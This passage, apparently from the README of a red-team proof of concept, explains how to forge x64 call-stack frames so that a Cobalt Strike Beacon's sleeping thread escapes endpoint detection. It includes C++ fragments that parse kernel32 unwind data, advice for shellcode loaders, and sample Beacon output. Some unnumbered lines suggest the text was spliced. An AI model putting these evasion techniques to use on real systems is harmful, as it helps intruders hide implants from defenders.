161 | 4. The system needs to know about all stack and frame pointer modifications that happened in each function across the call stack, so that it can virtually _roll back_ these changes and restore the stack pointers to the values they had when the call to the processed stack frame happened (this is implemented in [RtlVirtualUnwind](https://docs.microsoft.com/ru-ru/windows/win32/api/winnt/nf-winnt-rtlvirtualunwind)).
162 | 5. The system processes all `UNWIND_CODE`s that the examined function exhibits to precisely compute the location of that frame's return address and stack pointer value.
163 | 6. Through this emulation, the system is able to walk down the chain of call stack frames and effectively "unwind" the call stack.
164 |
165 | In order to interfere with this process we would need to _revert it_ by having our own reversed form of `RtlVirtualUnwind`. We would need to iterate over the functions defined in a module (say, `kernel32`), scan each function's `UNWIND_CODE` codes and closely emulate them backwards (as compared to `RtlVirtualUnwind` and, more precisely, `RtlpUnwindPrologue`) in order to find the locations on the stack where our fake return addresses should be placed.
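To make steps 4 and 5 a bit more tangible, here is a minimal, platform-independent sketch of how the fixed stack usage of a function prologue could be derived from its unwind codes. It is only an illustration under stated assumptions: the `sketch` namespace, the `prologStackSize` name and the raw 16-bit slot representation are hypothetical helpers that are not part of this PoC, and the slot layout (low byte = offset in prologue, next 4 bits = operation, top 4 bits = operation info) follows my reading of the documentation linked in (a). Chained unwind info, epilogues and dynamic allocations are deliberately ignored.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

namespace sketch {

// Unwind operation codes as listed in the x64 exception handling docs (a).
enum : std::uint8_t {
    UWOP_PUSH_NONVOL     = 0,   // push <nonvolatile register>
    UWOP_ALLOC_LARGE     = 1,   // sub rsp, <large constant>
    UWOP_ALLOC_SMALL     = 2,   // sub rsp, <8..128>
    UWOP_SET_FPREG       = 3,   // lea <frame register>, [rsp + offset]
    UWOP_SAVE_NONVOL     = 4,   // mov [rsp + offset], <register>
    UWOP_SAVE_NONVOL_FAR = 5,
    UWOP_SAVE_XMM128     = 8,
    UWOP_SAVE_XMM128_FAR = 9,
    UWOP_PUSH_MACHFRAME  = 10,
};

// Hypothetical helper: returns how many bytes the prologue described by
// `codes` lowered RSP by (the return address itself is not counted).
// Each element is one raw 2-byte unwind code slot.
inline std::size_t prologStackSize(const std::vector<std::uint16_t>& codes)
{
    std::size_t bytes = 0;
    std::size_t i = 0;

    while (i < codes.size()) {
        const std::uint8_t op   = (codes[i] >> 8) & 0x0F;
        const std::uint8_t info = (codes[i] >> 12) & 0x0F;
        const std::size_t  left = codes.size() - i;  // slots still available

        switch (op) {
        case UWOP_PUSH_NONVOL:
            bytes += 8;
            i += 1;
            break;
        case UWOP_ALLOC_SMALL:
            bytes += static_cast<std::size_t>(info) * 8 + 8;
            i += 1;
            break;
        case UWOP_ALLOC_LARGE:
            if (info == 0) {
                // Size divided by 8 is stored in the next slot.
                if (left < 2) return bytes;
                bytes += static_cast<std::size_t>(codes[i + 1]) * 8;
                i += 2;
            } else {
                // Unscaled 32-bit size is stored in the next two slots.
                if (left < 3) return bytes;
                bytes += static_cast<std::uint32_t>(codes[i + 1]) |
                         (static_cast<std::uint32_t>(codes[i + 2]) << 16);
                i += 3;
            }
            break;
        case UWOP_SET_FPREG:
            i += 1;               // does not move RSP
            break;
        case UWOP_SAVE_NONVOL:
        case UWOP_SAVE_XMM128:
            i += 2;               // register saves do not move RSP
            break;
        case UWOP_SAVE_NONVOL_FAR:
        case UWOP_SAVE_XMM128_FAR:
            i += 3;
            break;
        case UWOP_PUSH_MACHFRAME:
            bytes += info ? 48 : 40;
            i += 1;
            break;
        default:
            return bytes;         // unknown code: stop rather than guess
        }
    }
    return bytes;
}

} // namespace sketch
```

For a prologue such as `push rbp; push rbx; sub rsp, 0x28`, the slots would be `{0x4206, 0x3002, 0x5001}` and the function yields 56 bytes. Assuming no frame pointer and no dynamic allocation, that is the distance from `RSP` to the frame's return address once the prologue has run, which is the kind of value a reversed unwinder would need when deciding where a fake return address belongs.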
166 |
167 | [namazso](https://twitter.com/namazso) mentions the necessity to introduce 3 fake stack frames to nicely stitch the call stack:
168 |
169 | 1. A "desync" frame (consider it a _gadget-frame_) that unwinds differently compared to the caller of our `MySleep` (having a different `UWOP` - Unwind Operation code). We do this by looking through all functions from a module, looking through their UWOPs and calculating how big the fake frame should be. This frame must have UWOPs **different** than our `MySleep`'s caller.
170 | 2. The next frame that we want to find is a function that unwinds by popping into `RBP` from the stack - basically through the `UWOP_PUSH_NONVOL` code.
171 | 3. For the third frame, we need a function that restores `RSP` from `RBP` through the `UWOP_SET_FPREG` code.
172 |
173 | The restored `RSP` must be set to the `RSP` taken from wherever control flow entered our `MySleep`, so that all our frames become hidden as a result of the third gadget unwinding there.
174 |
175 | In order to begin the process, one can iterate over an executable's `.pdata` section by dereferencing the `IMAGE_DIRECTORY_ENTRY_EXCEPTION` data directory entry.
176 | Consider the example below:
177 |
178 | ```
179 |     ULONG_PTR imageBase = (ULONG_PTR)GetModuleHandleA("kernel32");
180 |     PIMAGE_NT_HEADERS64 pNthdrs = PIMAGE_NT_HEADERS64(imageBase + PIMAGE_DOS_HEADER(imageBase)->e_lfanew);
181 |
182 |     auto excdir = pNthdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION];
183 |     if (excdir.Size == 0 || excdir.VirtualAddress == 0)
184 |         return;
185 |
186 |     auto begin = PRUNTIME_FUNCTION(excdir.VirtualAddress + imageBase);   // first .pdata entry of kernel32
187 |     auto end = PRUNTIME_FUNCTION(excdir.VirtualAddress + imageBase + excdir.Size);   // one past the last entry
188 |
189 |     UNWIND_HISTORY_TABLE mshist = { 0 };
190 |     DWORD64 imageBase2 = 0;   // receives the base of the module that contains `caller`
191 |
192 |     PRUNTIME_FUNCTION currFrame = RtlLookupFunctionEntry(
193 |         (DWORD64)caller,
194 |         &imageBase2,
195 |         &mshist
196 |     );
197 |     if (!currFrame) return;   // no function table entry found for `caller`
198 |     UNWIND_INFO *mySleep = (UNWIND_INFO*)(currFrame->UnwindData + imageBase2);   // RVA is relative to the caller's module, not kernel32
199 |     UNWIND_CODE myFrameUwop = (UNWIND_CODE)(mySleep->UnwindCodes[0]);   // assumes at least one unwind code
200 |
201 |     log("1. MySleep RIP UWOP: ", myFrameUwop.UnwindOpcode);
202 |
203 |     for (PRUNTIME_FUNCTION it = begin; it < end; ++it)
204 |     {
205 |         UNWIND_INFO* unwindData = (UNWIND_INFO*)(it->UnwindData + imageBase);
206 |         UNWIND_CODE frameUwop = (UNWIND_CODE)(unwindData->UnwindCodes[0]);   // assumes at least one unwind code
207 |
208 |         if (frameUwop.UnwindOpcode != myFrameUwop.UnwindOpcode)
209 |         {
210 |             // Found candidate function for a desynch gadget frame
211 |
212 |         }
213 |     }
214 | ```
215 |
216 | The process is a bit convoluted, yet it boils down to reverting the thread's call stack unwinding process by substituting arbitrary stack frames with other, carefully selected ones, in a ROP-like approach.
217 |
218 | This PoC does not replicate this algorithm, because my current understanding allows me to accept the call stack finishing on an `EXE`-based stack frame and I don't want to overcomplicate either my shellcode loaders or this PoC. I'm leaving the exercise of implementing this and sharing it publicly to a keen reader.
Or maybe I'll sit down and give it a try myself, given some more spare time :)
219 |
220 |
221 | **More information**:
222 |
223 | - **a)** [x64 exception handling - Stack Unwinding process explained](https://docs.microsoft.com/en-us/cpp/build/exception-handling-x64?view=msvc-160)
224 | - **b)** [Sample implementation of `RtlpUnwindPrologue` and `RtlVirtualUnwind`](https://github.com/mic101/windows/blob/master/WRK-v1.2/base/ntos/rtl/amd64/exdsptch.c)
225 | - **c)** [`.pdata` section](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#the-pdata-section)
226 | - **d)** [Another sample implementation of `RtlpUnwindPrologue`](https://github.com/hzqst/unicorn_pe/blob/master/unicorn_pe/except.cpp#L773)
227 |
228 | ---
229 |
230 | ## Word of caution
231 |
232 | If you plan on adding this functionality to your own shellcode loaders / tooling, be sure to **AVOID** unhooking `kernel32.dll`.
233 | An attempt to unhook `kernel32` will restore the original `Sleep` functionality, preventing our callback from being called.
234 | If our callback is not called, the thread will be unable to spoof its own call stack by itself.
235 |
236 | If that's what you want to have, then you might need to run another, watchdog thread, making sure that the Beacon's thread will get spoofed whenever it sleeps.
237 |
238 | If you're using Cobalt Strike and the `unhook-bof` BOF by Raphael Mudge, be sure to check out my [Pull Request](https://github.com/Cobalt-Strike/unhook-bof/pull/1) that adds an optional parameter to the BOF specifying libraries that should not be unhooked.
239 |
240 | This way you can maintain your hooks in `kernel32`:
241 |
242 | ```
243 | beacon> unhook kernel32
244 | [*] Running unhook.
245 |     Will skip these modules: wmp.dll, kernel32.dll
246 | [+] host called home, sent: 9475 bytes
247 | [+] received output:
248 | ntdll.dll <.text>
249 | Unhook is done.
250 | ```
251 |
252 | [Modified `unhook-bof` with option to ignore specified modules](https://github.com/mgeeky/unhook-bof)
253 |
254 | ---
255 |
256 | ## Final remark
257 |
258 | This PoC was designed to work with Cobalt Strike's Beacon shellcodes. The Beacon is known to call out to `kernel32!Sleep` to await further instructions from its C2.
259 | This loader leverages that fact by hooking `Sleep` in order to perform its housekeeping.
260 |
261 | This implementation might not work with other shellcodes on the market (such as _Meterpreter_) if they don't use `Sleep` to cool down.
262 | Since this is merely a _Proof of Concept_ showing the technique, I don't intend to add support for any other C2 framework.
263 |
264 | Once you understand the concept, surely you'll be able to translate it into your shellcode requirements and adapt the solution to your advantage.
265 |
266 | Please do not open GitHub issues along the lines of "this code doesn't work with XYZ shellcode"; they'll be closed immediately.
267 |
268 | ---
269 |
270 | ### ☕ Show Support ☕
271 |
272 | This and other projects are the outcome of sleepless nights and **plenty of hard work**. If you like what I do and appreciate that I always give back to the community,
273 | [consider buying me a coffee](https://github.com/sponsors/mgeeky) _(or better a beer)_ just to say thank you! 💪
274 |
275 | ---
276 |
277 | ## Author
278 |
279 | ```
280 |    Mariusz Banach / mgeeky, 21
281 |
282 |    (https://github.com/mgeeky)
283 | ```
284 | --------------------------------------------------------------------------------